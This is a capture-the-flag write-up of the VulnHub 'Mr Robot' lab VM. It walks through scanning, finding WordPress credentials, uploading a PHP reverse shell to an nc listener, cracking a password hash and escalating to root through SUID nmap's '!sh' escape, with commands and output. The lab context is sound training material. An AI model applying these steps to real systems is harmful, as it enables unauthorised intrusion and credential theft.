VulnHub Write Up - Mr Robot
Vulnerable Machine:
Method:
- Scanned network to discover target
- Scanned ports and services on target
- Scanned the web application for vulnerabilities and information
- Scanned for specific WordPress vulnerabilities
- Exploit WordPress by uploading a php-reverse-shell
- Use a misconfigured SUID Bit to escalate privileges
Tools:
Useful links:
Write up:
The first step to any penetration testing, whether it is network or web based, is Intelligence Gathering. After we had our attacking machine and our Mr Robot virtual machine both on the host only network adapter, our first step was to scan our network for our target.
I ran an nmap scan with -n flag to skip DNS resolution as we
are on host only (the box is not connected to the internet, it is generally bad practice to have a vulnerable machine internet facing for obvious reasons), and with an -sn flag for host discovery and used the * wildcard to scan all
IP's from 192.168.56.0-255:
root@Hazana:~# nmap -n -sn 192.168.56.*
Starting Nmap 7.40 ( https://nmap.org ) at 2017-03-12 15:30
GMT
Nmap scan report for 192.168.56.103
Host is up (0.00013s latency).
MAC Address: 08:00:27:A2:13:1F (Oracle VirtualBox virtual
NIC)
Nmap scan report for 192.168.56.102
Host is up (0.00016s latency).
MAC Address: 08:00:27:CF:FB:C2 (Oracle VirtualBox virtual
NIC)
Nmap scan report for 192.168.56.103
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 6.98
seconds
As my machine is .103, and I know .100 is the host-only
ethernet adapter, then we have our target; .102
Next was to scan the target for ports and services.
The -A flag will probe for open ports, services and OS
fingerprinting:
root@Hazana:~# nmap -A -n 192.168.56.102
Starting Nmap 7.40 ( https://nmap.org ) at 2017-03-12 15:31
GMT
Nmap scan report for 192.168.56.102
Host is up (0.00030s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE
VERSION
22/tcp closed ssh
80/tcp open http
Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open
ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after:
2025-09-13T10:45:03
MAC Address: 08:00:27:CF:FB:C2 (Oracle VirtualBox virtual
NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3
cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.2
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.29 ms
192.168.56.102
(Unfortunately the actual webpages were having problems displaying for me, but from checking the source code and from what I've read there is some fun stuff to explore.)
We can see it is running a web server, I like to use a tool
called Nikto to scan for vulnerabilities or if anything is misconfigured:
root@Hazana:~# nikto -h 192.168.56.102
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:
192.168.56.102
+ Target Hostname:
192.168.56.102
+ Target Port:
80
+ Start Time: 2017-03-12 15:44:31 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache
+ The X-XSS-Protection header is not defined. This header
can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could
allow the user agent to render the content of the site in a different fashion
to the MIME type
+ Retrieved x-powered-by header: PHP/5.5.29
+ No CGI Directories found (use '-C all' to force check all
possible dirs)
+ Server leaks inodes via ETags, header found with file
/robots.txt, fields: 0x29 0x52467010ef8ad
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which
allows attackers to easily brute force file names. See
http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for
'index' were found: index.html, index.php
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3092: /readme: This might be interesting...
+ Uncommon header 'link' found, with contents:
<http://192.168.56.102/?p=23>; rel=shortlink
+ /wp-links-opml.php: This WordPress script reveals the
installed version.
+ OSVDB-3092: /license.txt: License file found may identify
site software.
+ /admin/index.html: Admin login page/section found.
+ Cookie wordpress_test_cookie created without the httponly
flag
+ /wp-login/: Admin login page/section found.
+ /wordpress/: A Wordpress installation was found.
+ /wp-admin/wp-login.php: Wordpress login found
+ /blog/wp-login.php: Wordpress login found
+ /wp-login.php: Wordpress login found
+ 7535 requests: 0 error(s) and 18 item(s) reported on
remote host
+ End Time:
2017-03-12 15:47:08 (GMT0) (157 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
We can gather some useful things from the Nikto scan:
- The server is leaking ETags, to do with CVE-2003-1418,
meaning the server is leaking sesnitive information of inode numbers and PIDs
- We can bruteforce the server for file names due to mod_negoiation being enabled with MultiViews
- Found an /admin, /admin/index.html (admin login page, we
will remember this if we find any credentials) and 2 /wp-login.php pages, also
useful if we find any credentials
- We also know the server is running WordPress, which often
contains vulnerabilities
I decided to run a Wpscan, a WordPress security scanner, it
gave us a lot of XSS issues but that wasn’t going to be useful for us:
root@Hazana:~/MrRobot# wpscan --url 192.168.56.102
[+] URL: http://192.168.56.102/
[+] Started: Sun Mar 12 16:18:09 2017
[+] robots.txt available under: 'http://192.168.56.102/robots.txt'
[+] Interesting header: SERVER: Apache
[+] Interesting header: X-FRAME-OPTIONS: SAMEORIGIN
[+] Interesting header: X-MOD-PAGESPEED: 1.9.32.3-4523
[+] XML-RPC Interface available under:
http://192.168.56.102/xmlrpc.php
However from this scan we can see /robots.txt is here.
/robots.txt is essentially a way of telling robots not to crawl these webpages so they wont display on google search for example.
After browsing to /robots.txt we can see the dissallowed
entries:
User-agent: *
fsocity.dic
key-1-of-3.txt
After browsing to 192.168.56.102/key-1-of-3.txt we get our
first key!
Key 1:
073403c8a58a1f80d943455fb30724b9
I then decided to check /fsocity.dic, where we got a download:
I opened it up with gedit and it seems to be a word list:
Using wc -l file in the terminal we can count the number of lines:
root@Hazana:~/MrRobot# wc -l fsocity.dic
858160 fsocity.dic
So a big wordlist!
I Decided to go back and check on what Nikto had found, I
browsed to /admin/index.html and checked the source code:
/readme.html:
/wp-links-opml.php revealed the WordPress version, this may
come in useful later:
/liscence.txt shows us:
"what do you just pull code from Rapid9 or some s@#% since when you become a script kitty?"
Which if I recall is a quote
from Elliot in the show:
I almost missed it but if you scroll down on the /liscence.txt page you can see what looks like a base64 encoded string right at the bottom.
So, I decoded it in my browser using the HackBar extension (check it out, I highly recommend it):
It decoded to elliot:ER28-0652. Seems like credentials, we shall go back and try these creds in /wp-admin/
which we made note of earlier:
Success!
Looking around I noticed under appearance > editor, we
can directly edit the php code! Lets try and get a reverse php shell!
Pentestmonkey have already written a great php reverse shell
here
or easily download in a terminal with:
git clone github.com/pentestmonkey/php-reverse-shell
Now we can edit the script
to put in our IP address:
Then copy and paste it into the WP editor:
Next we need to set up a netcat listener to listen for the
connection, the 1234 is the port number which was defined in the script:
root@Hazana:~ # nc -nvlp 1234
listening on [any] 1234 ...
Then browse to the url where we edited the php, which will make the web server execute our script:
http://192.168.56.102/wp-content/themes/twentyfifteen/404.php
Bingo! A reverse shell!
root@Hazana:~ #
connect to [192.168.56.103] from (UNKNOWN) [192.168.56.102]
35697
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18
00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
16:56:26 up
1:35, 0 users, load average: 0.00, 0.01, 0.05
USER TTY FROM LOGIN@ IDLE
JCPU PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
Now we can navigate in our PHP reverse shell:
$
$ cd home
$ ls
robot
$ cd robot
$ ls
key-2-of-3.txt
password.raw-md5
$ cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
Now we have an md5 hash! We could crack it ourselves, but
that might take a while so lets submit it on crackstation to see if they already
have the hash in their database.
Great! We now have a password and a username!
robot: abcdefghijklmnopqrstuvwxyz
Now we need to be able to login with these credentials,
however our PHP shell just won’t cut it, so we can upgrade our shell using a simple
trick with python. Some extra reading in the difference between terminals,
shells, tty and consoles can be found here.
$ python -c 'import pty; pty.spawn("/bin/sh")'
$ su robot
su robot
Password: abcdefghijklmnopqrstuvwxyz
(su can be thought of as switch user, so we can execute commands with the privileges of the robot user)
Now we are logged in as robot!
robot@linux:~$ ls
ls
key-2-of-3.txt password.raw-md5
robot@linux:~$ cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959
2nd key:
822c73956184f694993bede3eb39f959
Now let’s enumerate the internals of this host, I always
check to see if we have nmap installed:
robot@linux:~$ nmap --help
nmap --help
Nmap 3.81 Usage: nmap [Scan Type(s)] [Options] <host or
net list>
So, we have nmap installed, however it is a much older
version... Anyhow let’s scan ourselves using nmap -A localhost:
Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at
2017-03-12 17:14 UTC
Interesting ports on localhost (127.0.0.1):
(The 1659 ports scanned but not shown below are in state:
closed)
PORT STATE SERVICE
VERSION
21/tcp open ftp
vsFTPd 3.0.2
80/tcp open http Apache httpd
443/tcp open ssl
Nessus security scanner
3306/tcp open mysql
So, we have ftp and mysql running, interesting!
The problem is we have no credentials to access them we could brute force hoping for weak credentials. But I decided to have a look
around further to see if there were any clues:
robot@linux:/$ cd root
cd root
bash: cd: root: Permission denied
Hmm, perhaps some privilege escalation is in order.
There’s a reason it is constantly drilled into us to keep
our software up to date, I decided to check if there were any problems with
that old version of nmap.
Essentially we can find all files that are owned by root
with SUID permission bits (-perm -4000) and chuck any errors away to /dev/null:
robot@linux:/$ find / -user root -perm -4000 -print
2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
We can see nmap is in there! It shouldn't have these
permissions so let’s try and abuse them.
As this is an older nmap, we can start interactive mode with
--interactive:
robot@linux:/$ nmap --interactive
nmap> !sh
!sh
(The !sh lets us escape to a shell with the privileges nmap
has)
# cd root
cd root
# ls
ls
firstboot_done key-3-of-3.txt
# cat key-3-of-3.txt
cat key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
Just like that we can abuse the permission in our nmap shell
and read the final key!
Key 3:
04787ddef27c3dee1ee161b21670b4e4
Hope you enjoyed my first write up, any questions or improvements let me know, thanks!